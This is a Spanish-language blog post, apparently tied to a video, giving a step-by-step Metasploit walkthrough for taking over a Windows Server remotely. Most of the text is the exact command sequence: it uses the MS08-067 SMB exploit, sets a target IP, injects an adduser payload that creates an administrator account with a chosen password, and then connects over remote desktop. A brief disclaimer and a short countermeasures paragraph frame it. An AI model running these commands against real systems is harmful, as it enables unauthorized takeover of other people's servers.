Migramos. Nuevas Publicaciones en Nuestro Nuevo Dominio.

Apoderarse de un Servidor con S.O. Windows Server en forma Remota con Metasploit.

Este video se hace para efectos netamente académicos. No me hago responsable por el mal uso de los conocimientos aprendidos.

Las contramedidas para que esto no se realice por parte del cyberatacante de una forma tan facil es desabilitar el acceso remoto. Desde panel de control--- Sistema---acceso remoto y desmarcar todas las opciones. Aunque existen metodos para evitar esto, que se veran en futuros videos.

La mejor defensa es tener sistemas operativos modernos, actualizados en sus parches de seguridad, un firewall bien configurado e igualmente un ids/ips.



https://youtu.be/jvRL1NfQCrQ




Resumen de lo realizado:


*****Ejecutamos metasploit desde el icono del mismo o por consola *****con el comando:
msfconsole
****Ponemos en uso el exploit
use exploit/windows/smb/ms08_067_netapi

**** Configuramos la ip a atacar
set RHOST 192.168.1.11

****Ponemos en uso el payload a inyectar
set payload windows/adduser

****Configuramos nuevas variables
**** Variable para el nuevo usuario
set USER miusuario

****Variable para el password del mismo
set PASS Mipassword1
**** Ojo, se deben cumplir políticas... Minimo 1 Mayuscula 1 ****Minuscula 1 Numero y Minimo 8 caracteres
**** Seleccionar el grupo al que va a pertenecer el usuario
set CUSTOM Administradores

**** Permitir gestionar el grupo administradores al que va a
**** pertenecer
set WMIC true

****Lanzar el exploit
exploit

**** Conectarnos en remoto en una instancia completamente
**** independiente, transparente para el atacante.
*** Importante: hacerlo desde la misma consola metasploit.
rdesktop ip_host_remoto